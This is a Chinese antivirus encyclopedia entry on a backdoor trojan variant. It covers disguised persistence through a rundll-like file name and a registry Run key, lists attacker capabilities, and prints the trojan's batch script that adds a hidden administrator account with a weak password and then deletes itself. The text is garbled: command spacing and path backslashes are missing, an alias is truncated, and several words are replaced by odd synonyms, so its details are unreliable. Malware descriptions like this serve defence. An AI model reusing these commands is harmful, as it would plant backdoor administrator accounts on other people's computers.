病毒名称(中文):
金拱门变种X
病毒别名:
Backdoor.Wisdoor.x[AVP],BackDoor-AOZ[McAFee],Bac
威胁级别:
★☆☆☆☆
病毒类型:
黑客程序
病毒长度:
37888
影响系统:
Win9xWinNTWin2000WinXPWin2003
病毒行为:
编写工具:32位汇编语言
传染条件:
发作条件:用户误运行该程序
系统修改:
1.复制病毒到系统目录下%System%RUNDLLEXE,该病毒的名字与系统文件rundll.exe和rundll32.exe很相似,
假如不仔细看,用户一般比较难发现
2.在注册表中子键:HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
添加启动项:"WindowsDLLLoader"="%System%RUNDLLEXE",以便每次系统启动的时候该病毒也随之启动
3.在系统目录下建立临时批处理文件temp.bat,其内容如下:
@echooff
netuser/addSystemletmein
netlocalgroup/addAdministratorsSystem
del%0
其目的是在染毒系统中添加治理员帐户letmein,为以后入侵该机器作好预备
发作现象:
非凡说明:
假如黑客成功的控制了染毒机器,那么危害是比较大的:
A.从染毒机器下载文件
B.向染毒机器上传文件,当然病毒木马也在上传文件之列
C.修改或删除用户的数据
D.在染毒机器上执行某些程序(木马黑客程序应该是最有可能的了,嘿嘿!)
E.终止某些进程(例如:瑞星实时监控程序,天网防火墙等)
F.通过染毒机器向第3台机器发起攻击
